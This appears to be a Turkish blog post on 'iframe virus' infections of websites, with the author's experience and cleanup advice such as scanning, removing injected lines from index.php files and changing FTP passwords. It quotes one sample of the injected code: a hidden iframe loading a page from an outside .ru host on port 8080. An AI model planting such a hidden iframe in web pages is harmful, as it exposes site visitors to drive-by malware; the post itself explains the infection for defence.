Responsive Reklam Alanı

İFrame kodu internet sitelerine genelde Ftp adresine bağlanan kişilerin bilgisayarlarında ki bir virüs ile veya internet sayfamızın sisteminde bulunan bir açıktan sayfalarımıza eklenebilir. Bu kod genelde 1×1 ebatlarında bir frame olmakla beraber boyutu küçük olduğu için site sahibi bile anlamayabilir.

Son yıllarda sitelerin belası haline gelen ve interneti kasıp kavuran meşhur iframe virüslerinden biraz bahsetmek istiyorum. Daha önce bir çok kez karşılaştım hatta bazı sitelerim bu yüzden zararlı site haline gelmişti google aramalarında bir benzerinede dün rastladım bilgisayarımda antivirüs kurulu olmadığı için fark etmedim fakat müşterime sitesini teslim ettiğimde virüslü olduğunu fark ettim sıkıcı bir tablo.

</style>
</head>
<body>
<iframe src=”https://39t.ru:8080/index.php>
width=177 height=181 style=”visibility: hidden”>
</iframe>
Yukarıda gördüğünüz iframe virüsünün ta kendisi iki satırlık bir iframe kodu sitenizi mahfetmeye yetebiliyor bazen.
Bu virüs genelde sitenizin sadece index.php isimli dosyalarına bulaşmakda dolayısıyla virüsden kurtulmak için hostunuzda bulunan bütün index.php isimli dosyalarını bir kod editörü ile açıp son satırlarındaki iframe kodunu silmektir. Böylece virüsden kurtulmuş olursunuz sildiğiniz halde yinede virüs uyarısı çıkıyorsa sitenizi google webmaster araçlarına ekleyin orda size hangi dosyada virüs olduğunu söyler böylece virüs aramamış olursunuz.
İFrame Virüsünü Nasıl Temizleriz?
Virüs olduğunu tespitimizin hemen ardından sitemizin dosyalarını ve bilgisayarımızı güncel virüs programıyla taramamız hatta gerekirse birden fazla programla taramalıyız.
İnternet sitemizin dosyalarında iframe kodlarına bakmalıyız kodlar varsa silmeliyiz eğer bilgisayarımızı temizlemeden kodları silersek sorun kendi bilgisayarımızda ise otomatik olarak kodlar aynı bütün sayfalara eklenecektir.
En önemli çözümlerden birisi ise crackli olarak bilinen illegal yollarla düzenlenmiş programlardan uzak durmalıyız. Bu programları düzenleyenlerde hacker olduklarından dolayı bu işten çıkar sağlayacaklardır.
Sitemize erişim şifrelerini değiştirmeliyiz eğer sitemize kodları ekleyen Ftp şifrelerimizi biliyorsa tekrardan dosyaları değiştirmek isteyeceklerdir.
Bütün bu işlemleri yaptıktan sonra eğer sitemizin kesin olarak virüslerden arındığına eminsek Google Webmaster Tools aracılığı ile Google a yeniden sitemizi değerlendirmesi için başvuru yapıyoruz.
Paylaşmak Güzeldir
Yazar
Yazar
İnternet Üzerinden İşletim Sistemi Kullanmak Mümkünmü? Joomla Nedir? Ne İşe Yarar?
Bir yorum yazın
Siz de düşüncenizi belirtebilirsiniz.

Emre Supçin * Ecceplus WordPress Themes